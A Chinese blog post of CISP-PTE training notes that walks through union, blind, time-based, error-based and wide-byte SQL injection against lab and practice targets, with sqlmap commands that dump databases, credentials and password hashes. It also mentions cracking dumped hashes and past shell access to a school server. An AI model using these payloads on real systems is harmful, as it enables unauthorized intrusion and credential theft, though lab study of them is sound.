梦想闹钟
梦想闹钟

cisp-pte集训笔记第三天

第三天讲了sql注入,给了测试网站,在通知页面有一个注入点
cisp-pte集训笔记第三天_第1张图片
构造payload:

http://219.153.49.228:46485/new_list.php?id=1 and 1=1 order by 1
http://219.153.49.228:46485/new_list.php?id=1 and 1=1 order by 2

一直试到order by 5会返回白页面,所以可知这个页面有4个字段。Order by是索引排序。%20是url编码,空格变成%20

接下来寻找回显点

http://219.153.49.228:46485/new_list.php?id=-1 union select 3,4,5,6

cisp-pte集训笔记第三天_第2张图片
Id=-1返回白页,如果使用id=1会导致页面被盖掉。Union select 是联合查询,比较常见的注入点,特别是这种通知公告页面,我之前的就是通过通知公告页面+联合查询拿到了学校服务器的shell。通过select 3,4,5,6来确认回显点,可以知道4和5的位置是回显点

接下来通过database()函数和user()函数来确认库名和用户名

http://219.153.49.228:46485/new_list.php?id=-1%20union%20select%203,user(),5,6

cisp-pte集训笔记第三天_第3张图片

http://219.153.49.228:46485/new_list.php?id=-1%20union%20select%203,user(),5,6

cisp-pte集训笔记第三天_第4张图片

http://219.153.49.228:46485/new_list.php?id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=database()--%20-

Group concat是将查询结果拼成一个字符串,因为所有库的信息都保存在schema.tables里,所以先通过schema.tables查表名
cisp-pte集训笔记第三天_第5张图片
接下来查表里字段名

http://219.153.49.228:46485/new_list.php?id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%22StormGroup_member%22

cisp-pte集训笔记第三天_第6张图片
根据字段名提取信息

http://219.153.49.228:46485/new_list.php?id=-1 union select 1,group_concat(name),3,4 from StormGroup_member

cisp-pte集训笔记第三天_第7张图片
接下来提密码password

http://219.153.49.228:46485/new_list.php?id=-1 union select 1,group_concat(password),3,4 from StormGroup_member

cisp-pte集训笔记第三天_第8张图片
放到somd5里解密
cisp-pte集训笔记第三天_第9张图片
cisp-pte集训笔记第三天_第10张图片
然后就成功了
cisp-pte集训笔记第三天_第11张图片

接下来是尝试用sql-lab练习sql注入
Lesson-1
建议进入php文件,添加echo语句,让自己能看到构造的语句是啥样子,方便学习
cisp-pte集训笔记第三天_第12张图片
cisp-pte集训笔记第三天_第13张图片
Mysql注释符有3种:

1、#… "#"注释. 以#开头的一句表示注释一行如:
2、-- -,注意–后面有一个空格-
3、//

试一下 – -
cisp-pte集训笔记第三天_第14张图片
构造payload,使用order by来看下有多少个字段,试到4报错说明有3个字段
cisp-pte集训笔记第三天_第15张图片
接下来用一个单引号闭合掉id=1,然后再使用-- -注释掉后面语句,找到回显点

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,3%20--%20-

cisp-pte集训笔记第三天_第16张图片
看库名

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,database(),user()%20--%20-

cisp-pte集训笔记第三天_第17张图片

同样的方式,用union select从information_schema.tables 里读取表信息

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--%20-

cisp-pte集训笔记第三天_第18张图片
然后继续读取表里列名

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--%20-

cisp-pte集训笔记第三天_第19张图片

继续,尝试读取username和password

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(username),3%20from%20users--%20-

cisp-pte集训笔记第三天_第20张图片

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(password),3%20from%20users%20where%20username=%27admin%27--%20-

通过这样就直接可以得到用户的密码了
cisp-pte集训笔记第三天_第21张图片
以上就是基础手注的过程,接下来是用sql-lab 第5关理解盲注
构造几个payload发现,没有回显了
cisp-pte集训笔记第三天_第22张图片
盲注举例:实质就是用大量判断来逐个确定字符,因为工作量巨大,所以实际需要通过sqlmap和python脚本来实现。试几次后就能发现?id=1’ and length(database())=8-- -能返回正确页面,=7或=9都报错,说明库名就是8个字符(security)

猜测数据库

?id=1' and length(database())=8-- -
id=1' and left(database(),1)>'a' -- - 1
id=1' and left(database(),1)>'z' -- - 0

在a-z之间

id=1' and left(database(),1)>'r' -- -1
id=1' and left(database(),1)>'s' -- -0
id=1' and left(database(),2)>'sa'-- -

通过ascii码比较来筛选字符

猜测表

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1)b,1))>n

a是从0开始第几个表,b是为第几个字符,n是ASCII所对应的十进制数
第一个表

ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101

第二个表

ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101

判断user表

http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23

爆出字段

http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -

可以看到还是比较麻烦的,实际中用的还是sqlmap
sqlmap用法:
# 检测注入点是否可用

sqlmap -u ‘http://192.168.87.19/index.php?r=default/news/content&id=12’

#可曝出该mysql中所有数据库名称

sqlmap -u ‘http://192.168.87.19/index.php?r=default/news/content&id=12’ --dbs 

#web当前使用的数据库

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-db 

#web数据库使用账户

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-user

#列出sql所有用户

sqlmap -u ‘http://192.168.87.19/index.php?r=default/news/content&id=12’ --users 

#数据库账户与密码

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --passwords 

#输出所有的表

sqlmap -u ‘http://192.168.87.19/index.php?r=default/news/content&id=12’ --tables 

#-D 指定数据库名

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 --tables

#-T:指定要列出字段的表   --columns 列出了所有的列字段

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 -T 【表名】 --columns 

# -C :指定要暴的字段

sqlmap -u ‘http://192.168.87.19/index.php?r=default/news/content&id=12’ -D 【数据库名】 -T 【表名】 -C“username,realname,password” --dump 

基于时间的盲注,最麻烦也最耗时的注入

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1%27%20and%20sleep(6)--%20-

其中sleep(6)就是停6秒

通过以下语句来检查,和之前的盲注是一个原理,如果符合条件则页面响应时间边长

id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))-- -

substr就是取database()字符串的前1位,115是s的ascii码值
ascii(substr(database(),2,1)就是取字符串第二位,

接下来是报错注入,通过报错看信息,但还是需要回显点:
看版本

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php
?id=2' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) -- -

看库名

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php
?id=2' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- -

看列名

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php
?id=2' and updatexml(1,concat(0x7e,(select (column_name) from information_schema.columns where table_name="users" limit 0,1),0x7e),1)-- -

在sql-lab第5关即可实验报错注入,注意在注列名的时候只会出现一个字段,通过修改limit参数可以逐一把字段名读出来

0x7E是 ~符号

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
cisp-pte集训笔记第三天_第23张图片

练习:pikachu平台
cisp-pte集训笔记第三天_第24张图片
直接burp抓包-》send to repater
更改id字段尝试注入,和之前的知识点一样

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -

cisp-pte集训笔记第三天_第25张图片
此外,将burp里面的包copy下来放到txt里,使用sqlmap -r xxx.txt即可使用sqlmap 来跑

还有一种变化的万能密码,不过没有注入的情况下还有万能密码这种还是很少见的,最好还是抓包 sqlmap -r 跑
如 ’ or ‘1’=‘1’#

宽字节注入:
gbk编码,默认是两个字节当做中文处理,用%df来处理掉\符号,sqlmap需要特殊构造下才能跑出来

sqlmap -u "chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df'"

注意宽字节注入时表名,库名使用单引号会出问题,需要将名字转成16进制才行
如table_name=0x67626b73716c69

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x67626b73716c69--%20-

你可能感兴趣的:(信息安全)

  • 个人网络防范 潜※者 网络安全
    目录安全事件频发根源在于背后利益链条不仅仅是中国网络安全事件成国际性难题个人网络信息安全防护四招来帮忙首先,预防第一第二,健康的上网浏览习惯第三,WiFi安全性第四,规范的文件处理黑客攻击无孔不入,钓鱼网站日益频发多发,伪基站不断升级,甚至从不联网的WindowsXP都有可能感染病毒。2016年6月23日,中国五联网协会发布的《2016中国网民权益保护调查报告》显示,从2015年下半年到2016年
  • 再扩国产化适配版图,长安链新增数据库兼容性认证 长安链开源社区 数据库
    基础软件的自主可控影响着国家信息安全与产业技术发展是否受制于人。实现真正长期可持续的技术自主可控,需要再进一步的是让国产化信息系统生态更有”活性“,基础软件之间、基础软件与其他国产上层应用的互相兼容、互相促进,共同繁荣发展,才能让产业链上下游具备多样性和技术创新的空间。近日长安链对国产数据库完成了兼容性认证,在与达梦数据库、TDSQL的测试中,表明长安链与联合测评的国产数据库兼容性良好、功能正常、
  • 在渗透领域,一个非常厉害的 Python 库 qq_30895747 python模块python开发语言
    在信息安全领域,PythonFsociety库是一个备受欢迎的工具,它提供了许多用于渗透测试、网络攻击和安全研究的功能。本文将深入探讨Fsociety库的功能、用法以及实际应用,以帮助大家更好地了解如何使用它来增强网络安全。什么是PythonFsociety库?Fsociety是一个Python库,专门设计用于进行渗透测试、网络攻击和信息安全研究。它提供了各种工具和功能,以帮助安全专业人员测试网络
  • 第九章、信息安全与多媒体基础5分 蒋劲豪 软考-中级-软件设计师软件工程
    信息系统安全属性保密性、完整性、可用性、可控性、可审查性网络安全威胁物理威胁、网络攻击、身份鉴别、编程威胁、系统漏洞对称加密DES、3DES、AES、RC-5、IDEA
  • 拼多多会不会透露个人信息?别人会看到你的个人信息吗 氧惠购物达人
    拼多多是中国颇具规模的电子商务平台,与其他在线平台一样,为提供更佳服务而收集并处理用户个人信息。随着在线购物的兴起,用户隐私和信息安全备受关注。➤推荐网购返利app“氧惠”,一个领隐藏优惠券+现金返利的平台。氧惠只提供领券返利链接,下单全程都在淘宝、京东、拼多多等原平台,更支持抖音、快手电商、外卖红包返利等。(应用市场搜“氧惠”下载,邀请码:521521,全网优惠上氧惠!)➤由于信息差的关系,很多
  • 反向代理服务器如何提升信息安全 小文没烦恼 python网络服务器开发语言代理服务器
    目录前言一、反向代理服务器提升信息安全的功能1.1负载均衡1.2缓存1.3SSL加密1.4访问控制二、反向代理服务器提升信息安全的实现方式2.1Nginx反向代理服务器2.2Apache反向代理服务器总结前言反向代理服务器是一种位于客户端和目标服务器之间的中间层服务器,它接收客户端的请求并将其转发给目标服务器。反向代理服务器在提供负载均衡、缓存、SSL加密等功能的同时,还可以起到一定的信息安全保护
  • linux安全配置规范 十年人间~ linux安全服务器
    一、概述1.1适用范围本配置规范适用于凝思操作系统,主要涉及LINUX操作系统安全配置方面的基本要求,用于指导LINUX操作系统安全加固工作,落实信息安全等级保护等保三级系统操作系统安全配置,为主机安全配置核查提供依据。1.2实施策略序号配置类别配置项名称实施策略1身份鉴别口令复杂度策略合规2身份鉴别登录失败账户锁定策略合规3身份鉴别口令最长生存期策略合规4身份鉴别SSH登录配置合规5访问控制多余
  • 计算机等级考试:信息安全技术 知识点二 ting_liang 计算机网络
    1、信息技术的飞速发展,对人类社会产生了重要影响,其主流是积极的,但也客观存在一些负面影响,这些负面影响有:信息泛滥、信息污染、信息犯罪。2、1949年,香农发表了著名的《保密系统的通信理论》的论文,把密码学置于坚实的数学基础上,标志着密码学作为一门学科的形成。3、数字签名的过程使用的是签名者的私有密钥,验证数字签名时,使用的是签名者的公有密钥。4、已知最早的代换密码是由JuliusCaesar发
  • 直返平台的信誉度如何评估?直返APP是否可信? 高省爱氧惠
    直返作为一个购物平台,始终秉持着为用户提供安全、稳定、可靠的服务。我们有着严格的安全措施和技术手段,确保用户的信息安全和交易安全。同时,我们与多家知名品牌和商家合作,保证商品的正品保障和品质可靠。氧惠APP(带货领导者)——是与以往完全不同的抖客+淘客app!2023全新模式,我的直推也会放到你下面。主打:带货高补贴,深受各位带货团队长喜爱(每天出单带货几十万单)。注册即可享受高补贴+0撸+捡漏等
  • CCRC-DSO数据安全官 CCRC_137_1602_6231 安全运维网络安全服务器信息可视化
    数据安全官(DataSecurityOfcer,简称“DSO”)是中国网络安全审查技术与认证中心(英文缩写为:CCRC,原为中国信息安全认证中心)针对数据安全领域方向开设的培训认证。CCRC-DSO课程从顶层设计出发,培养对数据安全管理体系、法律合规数据治理、安全技术通盘整合的数据安全精英人才,保护数据安全,释放数据价值,决胜数字经济时代。请查收附件!系统体系化的数据安全课内容覆盖数据安全国际国内
  • 天星金融(原小米金融)加强信息安全普及,预防电信诈骗案件 Z8276q3 金融
    在高度发达的信息时代,随着移动互联网的普及和5G技术的推广,智能手机已经成为每个人生活的必需品。然而,一些诈骗分子趁虚而入,利用手机进行各种新型的诈骗活动,向消费者发送短信钓鱼链接是电信诈骗的常用手法之一。面对日益严峻且复杂的网络安全形势,天星金融(原小米金融)切实承担起网络安全风险防范的主体责任,加强金融消费者信息安全普及宣教,全力构建“全社会反诈”工作格局,从源头上预防和遏制电信诈骗案件。“短
  • 网络安全是什么 安全
    网络安全是一种保护计算机、服务器、移动设备、电子系统、网络和数据免受恶意攻击的技术,这种技术也称为信息技术安全或电子信息安全。该术语适用于从业务到移动计算的各种环境,可以分为几个常见类别:网络安全是一种保护计算机网络免受入侵者(无论是定向攻击还是条件恶意软件)攻击的技术。应用程序安全侧重于保护软件和设备免受威胁。受到侵害的应用程序可能会对其旨在保护的数据提供访问权限。并且,早在应用程序设计阶段而非
  • 阿里云高防服务器如何实现安全防护,以及如何接触安全防护 九河云 安全服务器阿里云
    随着互联网的发展,网络安全问题日益突出,不法分子利用网络空间进行各种网络攻击,如DDoS攻击、SQL注入、XSS漏洞等,给个人、企业甚至国家的信息安全带来了极大的威胁。为了保障网络安全,高防服务器和阿里云服务器是很好的选择,下面九河云来讲讲高防服务器怎样实现安全防护措施,以及阿里云服务器安全防护怎么解除。一、高防服务器的安全防护措施1、DDoS攻击防护DDoS攻击属于分布式拒绝服务攻击,其主要手段
  • 从玩游戏到写外挂,C语言/C++程序员大神是怎样做到的! 小辰带你看世界
    今天和大家分享一下我自己的C语言学习的过程,与大家共勉。嗯,由于我本人水平有限,出现错误在所难免,希望大家看到后能够指出来,以便大家共同进步。C语言是面向过程的,而C++是面向对象的这些是C/C++能做的服务器开发工程师、人工智能、云计算工程师、信息安全(黑客反黑客)、大数据、数据平台、嵌入式工程师、流媒体服务器、数据控解、图像处理、音频视频开发工程师、游戏服务器、分布式系统、游戏辅助等首先我来讲
  • 信息安全工程师(中级)-知识点汇总 琴剑飘零西复东 网络安全
    一、信息安全基础1.信息≠数据(结构化、非结构化),信息=有价值的数据2.信息三种状态:存储状态、传输状态、运行(处理)状态3.信息安全三部法:网络安全法、数据安全法、个人信息保护法4.信息安全三要素(基本属性):机密性(C)、完整性(I)、可用性(A)5.实现信息安全机密性的方法:加密、访问控制6.检查信息安全完整性的方法:哈希函数7.信息安全其他要素:不可否认性(数字签名)、可控性、认真性/真
  • 2024022702-信息安全(三)——对称密码体制 武昌库里写JAVA 面试题汇总与解析密码密码学信息安全
    单密钥系统的加密密钥和解密密钥相同,或实质上等同,即从一个易于得出另一个,如下图所示。对称密码算法(symmetriccipher):DES(DataEncryptionStandard)TripleDESIDEAAESRC5CAST-128。。。。。。分组密码算法(BlockCipher)特点明文被分为固定长度的块,即分组,分组一般为64比特,或者128比特对每个分组用相同的算法和密钥加/解密密
  • 汽车信息安全概述 Autosar汽车电子进阶 工作生活随笔信息安全autosar
    随着智能网联汽车的迅猛发展,车辆不再是简单的交通工具,而是集数据收集、处理与通信于一体的移动智能终端。然而,这一变革也使得汽车成为黑客攻击的新目标。汽车信息安全问题日益凸显,成为行业关注的焦点。本文将深入探讨汽车信息安全的重要性,介绍相关技术,并分析面临的挑战。汽车信息安全的重要性不言而喻。一方面,汽车与互联网的深度融合使得车辆控制系统可能遭受远程攻击,威胁到乘客的生命安全;另一方面,车载数据的价
  • 信息安全 python_一种基于Python的信息安全情报收集工具 weixin_39637646 信息安全python
    邵云蛟吴丽莎张凯吴屏摘要:目前,公司信息安全情报收集工作主要依靠人工方式进行。主要由运维人员每日登陆相关信息安全资讯网站或接收由绿盟、启明等安全厂商发送的信息安全情报信息,这种方式效率低下,耗时耗力。关键词:Python;终端监控;安全管理中图分类号:TP391文献标识码:A文章编号:1671-2064(2018)13-0019-01为了提升公司信息安全情报的收集效率,实时掌握网络安全态势[1],
  • 分布式id实战 kk_0910 java
    目录常用方式特征潜在问题信息安全高性能UUID雪花算法数据库生成美团Leaf方案Leaf-segment数据库方案Leaf-snowflake方案常用方式uuid雪花算法数据库主键特征全局唯一趋势递增信息安全潜在问题信息安全如果id连续递增,容易被爬虫,批量下载数据如果订单id是连续递增,容易被竞争对手推算出日交易量,这时候需要ID不规则可能泄漏本机mac地址高性能保证在高qps时候,系统也高可用
  • 中科网威加入OurBMC,共筑信创网络安全硬件生态新篇章 程序员
    近日,北京中科网威信息技术有限公司(以下简称“中科网威”)正式签署CLA(ContributorLicenseAgreement,贡献者许可协议),宣布正式加入OurBMC社区。北京中科网威信息技术有限公司成立于1999年,前身是中科院1996年成立的网威安全工作室,是我国较早从事网络安全技术研究及网络安全产品研发、生产、销售和服务的企业。作为自主可控网络信息安全综合厂商,自2011年开始,公司便
  • 低代码开发与网络信息安全:构建高效防护体系 工业甲酰苯胺 低代码网络
    随着数字化转型的加速,越来越多的企业开始关注低代码开发平台,以提高软件开发效率,缩短上市时间。然而,随之而来的网络信息安全问题也日益严峻。如何在享受低代码开发带来的便捷与高效的同时,确保网络信息安全成为企业面临的重要课题。本文将从以下几个方面探讨低代码开发与网络信息安全之间的关系,并提出相应的应对策略。低代码开发平台的安全挑战低代码开发平台在现代软件开发中越来越受欢迎,它通过简化编程过程和降低开发
  • 态势感知是什么?为何需要态势感知? 安全
    网络信息技术的发展背景之下,无论是企业还是个人对网络的依赖性不断增加,信息安全已经不再是一个传统的技术问题。态势感知应势而生,作为网络安全领域的热点,态势感知协助解决了一系列网络安全问题。什么是态势感知?事实上,态势感知是一种基于环境的、动态的、全面的洞察安全风险的能力。它以安全大数据为基础,从全局的角度,提高对安全威胁的发现识别、理解分析和处理反应能力。目的在于在大规模网络环境下,对能够引起网络
  • 等级保护是什么,为什么要做等级保护 后端
    一、什么是等级保护:等级保护是一种信息安全管理方法,用于对不同级别的信息和信息系统进行分类、评估和保护。它涉及将信息系统和信息按照其重要性和敏感性分级别,然后根据等级要求实施相应的安全措施,以确保信息的保密性、完整性和可用性。等级保护通常包括信息系统的定级、备案、安全建设、测评和监督等阶段,以确保信息系统达到特定的安全标准和法规要求。随着信息化技术的飞速发展,信息系统已经成为企业和政府机构日常运营
  • 什么是CISSP认证? 承制科技
    认证机构介绍CISSP(CertifiedInformationSystemSecurityProfessional,注册信息系统安全认证专家)是目前世界上权威全面的国际化信息系统安全方面的认证,由国际信息系统安全认证协会(ISC)2组织和管理,(ISC)2在全世界各地举办考试,符合考试资格的人员在通过考试后被授予CISSP认证证书。CISSP可以证明证书持有者具备了符合国际标准要求的信息安全知识
  • HTTPS 安全通信原理 从不中二的忧伤
    随着人们网络安全意识的提高,人们对信息的安全传输越来越重视。各大公司也逐步将网站升级成HTTPS。那么,相较于HTTP,HTTPS是怎么保证信息的安全传输的?此文介绍了HTTPS的信息安全传输原理。一、HTTP为什么不安全?HTTP是明文传输,存在三大风险:窃听风险、篡改风险、冒充风险窃听风险:由于HTTP明文传输,中间人可以轻易获取到通信内容。篡改风险:中间人可以篡改信息传输内容冒充风险:中间人
  • 防御保护--信息安全概述 码上方舟 网络安全网络安全
    防御保护--信息安全概述一、网络安全的背景1.1网络安全的定义网络安全又叫网络空间安全(Cyberspace),2003年美国提出网络空间的概念,即一个由信息基础设施(包括计算机、交换机、服务器等物质实体)组成的互相依赖的网络。我国官方文件的定义,即网络空间为继海(海洋)、陆(陆地)、空(天空)、天(太空)以外的第五大人类活动领域。1.2信息安全和网络安全(1)信息安全就是数据安全,即防止任何对数
  • 信息安全-操作系统安全保护(一) learning-striving 信息安全安全网络系统安全网络安全
    一、操作系统安全概述1.1操作系统安全概念是指满足安全策略要求,具有相应的安全机制及安全功能,符合特定的安全标准,在一定约束条件下,能够抵御常见的网络安全威胁,保障自身的安全运行及资源安全根据安全功能和安全保障要求,将操作系统分成五个安全等级用户自主保护级系统审计保护级安全标记保护级结构化保护级访问验证保护级操作系统的安全可控:是指用户可以按照预期的安全要求,实现对操作系统的操作和控制,以满足用户
  • WEB服务器的超级防护——安全WAF 德迅云安全小李 安全web安全
    随着网络和信息技术的不断发展,特别是互联网的广泛普及和应用,网络正在逐步改变人类的生活和工作方式。越来越多的政府和企业组织建立了依赖于网络的业务信息系统,例如电子政务、网络办公等。网络也对社会各行各业产生了巨大的影响,使信息安全的重要性不断提高。与此同时,WEB网站成为黑客攻击的主要目标之一,与网站相关的安全事件频繁发生,企业数据和个人信息的泄露屡见不鲜,这给企业带来了严重的经济损失,也给社会造成
  • 安全架构设计理论与实践 一心猿 安全架构安全
    一、考点分布安全架构概述(※※)安全模型(※※※)信息安全整体架构设计网络安全体系架构设计区块链技术(※※)二、安全架构概述被动攻击:收集信息为主,破坏保密性主动攻击:主动攻击的类别主要有:中断(破坏可用性)、篡改(破坏完整性),伪造(破坏真实性)三、安全模型BLP模型(属于机密性模型)Bell-LaPadula模型是符合军事安全策略的计算机安全模型,简称BLP模型。BLP模型的安全规则:简单安全
  • KMS密钥管理有哪些安全功能 SafePloy安策 网络服务器运维
    KMS(KeyManagementService)密钥管理服务是一种专门用于管理和保护加密密钥的系统。在现代的信息安全领域中,密钥的重要性不言而喻,它是确保数据加密、解密以及身份验证等安全操作的核心要素。KMS的出现,极大地提高了密钥管理的效率和安全性,为企业和组织提供了强有力的保障。KMS的核心功能主要包括密钥生成、存储、分发、使用、更新、吊销和销毁等全生命周期管理。这些功能确保了密钥在整个生命
  • LeetCode[位运算] - #137 Single Number II Cwind javaAlgorithmLeetCode题解位运算
    原题链接:#137 Single Number II  要求: 给定一个整型数组,其中除了一个元素之外,每个元素都出现三次。找出这个元素 注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间   难度:中等   分析: 与#136类似,都是考察位运算。不过出现两次的可以使用异或运算的特性 n XOR n = 0, n XOR 0 = n,即某一
  • 《JavaScript语言精粹》笔记 aijuans JavaScript
    0、JavaScript的简单数据类型包括数字、字符创、布尔值(true/false)、null和undefined值,其它值都是对象。 1、JavaScript只有一个数字类型,它在内部被表示为64位的浮点数。没有分离出整数,所以1和1.0的值相同。 2、NaN是一个数值,表示一个不能产生正常结果的运算结果。NaN不等于任何值,包括它本身。可以用函数isNaN(number)检测NaN,但是
  • 你应该更新的Java知识之常用程序库 Kai_Ge java
    在很多人眼中,Java 已经是一门垂垂老矣的语言,但并不妨碍 Java 世界依然在前进。如果你曾离开 Java,云游于其它世界,或是每日只在遗留代码中挣扎,或许是时候抬起头,看看老 Java 中的新东西。 Guava Guava[gwɑ:və],一句话,只要你做Java项目,就应该用Guava(Github)。 guava 是 Google 出品的一套 Java 核心库,在我看来,它甚至应该
  • HttpClient 120153216 httpclient
    /** * 可以传对象的请求转发,对象已流形式放入HTTP中 */ public static Object doPost(Map<String,Object> parmMap,String url) { Object object = null; HttpClient hc = new HttpClient(); String fullURL
  • Django model字段类型清单 2002wmj django
    Django 通过 models 实现数据库的创建、修改、删除等操作,本文为模型中一般常用的类型的清单,便于查询和使用: AutoField:一个自动递增的整型字段,添加记录时它会自动增长。你通常不需要直接使用这个字段;如果你不指定主键的话,系统会自动添加一个主键字段到你的model。(参阅自动主键字段) BooleanField:布尔字段,管理工具里会自动将其描述为checkbox。 Cha
  • 在SQLSERVER中查找消耗CPU最多的SQL 357029540 SQL Server
    返回消耗CPU数目最多的10条语句 SELECT TOP 10    total_worker_time/execution_count AS avg_cpu_cost, plan_handle,    execution_count,    (SELECT SUBSTRING(text, statement_start_of
  • Myeclipse项目无法部署,Undefined exploded archive location 7454103 eclipseMyEclipse
    做个备忘! 错误信息为:       Undefined exploded archive location 原因:           在工程转移过程中,导致工程的配置文件出错; 解决方法:    
  • GMT时间格式转换 adminjun GMT时间转换
    普通的时间转换问题我这里就不再罗嗦了,我想大家应该都会那种低级的转换问题吧,现在我向大家总结一下如何转换GMT时间格式,这种格式的转换方法网上还不是很多,所以有必要总结一下,也算给有需要的朋友一个小小的帮助啦。 1、可以使用 SimpleDateFormat SimpleDateFormat    EEE-三位星期 d-天 MMM-月 yyyy-四位年
  • Oracle数据库新装连接串问题 aijuans oracle数据库
    割接新装了数据库,客户端登陆无问题,apache/cgi-bin程序有问题,sqlnet.log日志如下: Fatal NI connect error 12170.   VERSION INFORMATION:         TNS for Linux: Version 10.2.0.4.0 - Product
  • 回顾java数组复制 ayaoxinchao java数组
    在写这篇文章之前,也看了一些别人写的,基本上都是大同小异。文章是对java数组复制基础知识的回顾,算是作为学习笔记,供以后自己翻阅。首先,简单想一下这个问题:为什么要复制数组?我的个人理解:在我们在利用一个数组时,在每一次使用,我们都希望它的值是初始值。这时我们就要对数组进行复制,以达到原始数组值的安全性。java数组复制大致分为3种方式:①for循环方式 ②clone方式 ③arrayCopy方
  • java web会话监听并使用spring注入 bewithme Java Web
            在java web应用中,当你想在建立会话或移除会话时,让系统做某些事情,比如说,统计在线用户,每当有用户登录时,或退出时,那么可以用下面这个监听器来监听。        import java.util.ArrayList; import java.ut
  • NoSQL数据库之Redis数据库管理(Redis的常用命令及高级应用) bijian1013 redis数据库NoSQL
    一 .Redis常用命令         Redis提供了丰富的命令对数据库和各种数据库类型进行操作,这些命令可以在Linux终端使用。         a.键值相关命令         b.服务器相关命令 1.键值相关命令       &
  • java枚举序列化问题 bingyingao java枚举序列化
    对象在网络中传输离不开序列化和反序列化。而如果序列化的对象中有枚举值就要特别注意一些发布兼容问题: 1.加一个枚举值 新机器代码读分布式缓存中老对象,没有问题,不会抛异常。 老机器代码读分布式缓存中新对像,反序列化会中断,所以在所有机器发布完成之前要避免出现新对象,或者提前让老机器拥有新增枚举的jar。 2.删一个枚举值 新机器代码读分布式缓存中老对象,反序列
  • 【Spark七十八】Spark Kyro序列化 bit1129 spark
    当使用SparkContext的saveAsObjectFile方法将对象序列化到文件,以及通过objectFile方法将对象从文件反序列出来的时候,Spark默认使用Java的序列化以及反序列化机制,通常情况下,这种序列化机制是很低效的,Spark支持使用Kyro作为对象的序列化和反序列化机制,序列化的速度比java更快,但是使用Kyro时要注意,Kyro目前还是有些bug。 Spark
  • Hybridizing OO and Functional Design bookjovi erlanghaskell
      推荐博文: Tell Above, and Ask Below - Hybridizing OO and Functional Design 文章中把OO和FP讲的深入透彻,里面把smalltalk和haskell作为典型的两种编程范式代表语言,此点本人极为同意,smalltalk可以说是最能体现OO设计的面向对象语言,smalltalk的作者Alan kay也是OO的最早先驱,
  • Java-Collections Framework学习与总结-HashMap BrokenDreams Collections
            开发中常常会用到这样一种数据结构,根据一个关键字,找到所需的信息。这个过程有点像查字典,拿到一个key,去字典表中查找对应的value。Java1.0版本提供了这样的类java.util.Dictionary(抽象类),基本上支持字典表的操作。后来引入了Map接口,更好的描述的这种数据结构。  &nb
  • 读《研磨设计模式》-代码笔记-职责链模式-Chain Of Responsibility bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /** * 业务逻辑:项目经理只能处理500以下的费用申请,部门经理是1000,总经理不设限。简单起见,只同意“Tom”的申请 * bylijinnan */ abstract class Handler { /*
  • Android中启动外部程序 cherishLC android
    1、启动外部程序 引用自: http://blog.csdn.net/linxcool/article/details/7692374 //方法一 Intent intent=new Intent(); //包名 包名+类名(全路径) intent.setClassName("com.linxcool", "com.linxcool.PlaneActi
  • summary_keep_rate coollyj SUM
    BEGIN /*DECLARE minDate varchar(20) ; DECLARE maxDate varchar(20) ;*/ DECLARE stkDate varchar(20) ; DECLARE done int default -1; /* 游标中 注册服务器地址 */ DE
  • hadoop hdfs 添加数据目录出错 daizj hadoophdfs扩容
    由于原来配置的hadoop data目录快要用满了,故准备修改配置文件增加数据目录,以便扩容,但由于疏忽,把core-site.xml, hdfs-site.xml配置文件dfs.datanode.data.dir 配置项增加了配置目录,但未创建实际目录,重启datanode服务时,报如下错误: 2014-11-18 08:51:39,128 WARN org.apache.hadoop.h
  • grep 目录级联查找 dongwei_6688 grep
